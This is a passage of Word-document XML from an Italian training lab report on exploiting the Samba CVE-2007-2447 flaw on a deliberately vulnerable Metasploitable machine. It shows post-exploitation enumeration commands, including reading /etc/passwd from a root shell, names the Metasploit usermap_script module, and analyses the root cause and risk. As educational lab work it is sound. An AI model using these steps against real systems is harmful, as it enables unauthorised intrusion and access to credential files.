    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">uname -a</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">pwd</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="3541395"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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207000" cy="3541395"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 7 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output dei comandi di enumerazione whoami, uname -a, pwd e ls -la eseguiti nella shell remota: il comando whoami restituisce l'identità root, a conferma dell'ottenimento di privilegi amministrativi sul sistema target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esito del comando whoami ha evidenziato come la sessione ottenuta disponga dei privilegi dell'utente root, circostanza riconducibile al fatto che il demone Samba, sul sistema target, viene eseguito con privilegi amministrativi: tale condizione determina, in caso di sfruttamento riuscito della vulnerabilità, l'immediato conseguimento del massimo livello di privilegio disponibile sul sistema, senza necessità di ulteriori tecniche di privilege escalation. Il comando uname -a ha inoltre confermato le caratteristiche del sistema operativo target (kernel Linux 2.6.24-16-server, architettura i686), coerenti con la natura volutamente obsoleta della distribuzione Metasploitable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Verifica dell'accesso al file system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A ulteriore dimostrazione del livello di accesso ottenuto, è stato acquisito il contenuto del file /etc/passwd, tradizionalmente impiegato, nell'ambito di esercitazioni didattiche di questo tipo, quale prova della capacità di lettura di file di sistema riservati:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="4704080"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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5207000" cy="4704080"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output del comando cat /etc/passwd eseguito nella shell remota: elenco degli account di sistema configurati sul target, a dimostrazione dell'accesso in lettura ottenuto ai file di sistema riservati.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'accesso in lettura al file /etc/passwd, unitamente ai risultati delle fasi precedenti, completa il quadro probatorio dell'avvenuto sfruttamento della vulnerabilità, dimostrando come, a partire da un servizio di rete erroneamente configurato, sia stato possibile conseguire il controllo completo del sistema operativo target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Risultati Ottenuti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Le evidenze raccolte nel corso dell'esercitazione confermano il pieno conseguimento degli obiettivi prefissati. In sintesi, l'attività ha consentito di:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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identificare, mediante ricognizione attiva (nmap) e scansione di vulnerabilità (Nessus), il servizio Samba vulnerabile in ascolto sulla porta 445/tcp del sistema target;</w:t>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classificare correttamente la vulnerabilità individuata secondo il relativo identificativo CVE-2007-2447 e il punteggio di severità CVSS (10.0, Critical);</w:t>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sfruttare con successo la vulnerabilità mediante il modulo exploit/multi/samba/usermap_script del Metasploit Framework, ottenendo l'esecuzione di comandi da remoto sul sistema target;</w:t>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verificare, mediante comandi di enumerazione (ifconfig, whoami, uname -a, cat /etc/passwd), il conseguimento di una shell con privilegi di amministratore (root) sul sistema compromesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Analisi dei Risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'analisi tecnica dell'esercitazione consente di formulare alcune osservazioni di rilievo in merito alla natura e all'impatto della vulnerabilità sfruttata. La causa radice (root cause) risiede in una carenza di validazione dell'input lato server: il demone Samba, nella gestione del parametro di configurazione username map script, non effettua un'adeguata sanificazione dei caratteri contenuti nel campo username trasmesso in fase di autenticazione, consentendo l'iniezione e la conseguente esecuzione di comandi di shell arbitrari a livello di sistema operativo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un ulteriore elemento critico riguarda il contesto di privilegio con cui il servizio vulnerabile viene eseguito: l'esecuzione del demone Samba con privilegi di amministratore (root) determina che qualsiasi comando eseguito per il tramite della vulnerabilità erediti automaticamente il medesimo livello di privilegio, senza necessità di ulteriori tecniche di elevazione (privilege escalation). Tale circostanza amplifica in maniera significativa l'impatto potenziale della vulnerabilità, che da una prospettiva di rischio risulta pertanto classificabile come critica sia in termini di probabilità di sfruttamento — data la disponibilità pubblica di un modulo di exploitation pienamente automatizzato — sia in termini di impatto, corrispondente alla compromissione totale del sistema (full system compromise).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si osserva, infine, come il processo dimostrato nell'esercitazione — dall'identificazione automatizzata della vulnerabilità mediante scanner dedicato, fino al suo sfruttamento tramite modulo pubblicamente disponibile — richieda competenze tecniche relativamente contenute, a fronte di un impatto potenziale estremamente elevato: tale asimmetria costituisce una delle ragioni per cui vulnerabilità di questa natura, se non tempestivamente rimediate, rappresentano un rischio prioritario nell'ambito della gestione della sicurezza informatica aziendale.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>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6.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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4.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8.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sgBigGA/N/YWpxNVb0XpMmBUpPQ==">CgMxLjA4AHIhMVhwNFVrbERYUHFFV1lsX3R4V29qQ19COVZDWXdiRFBG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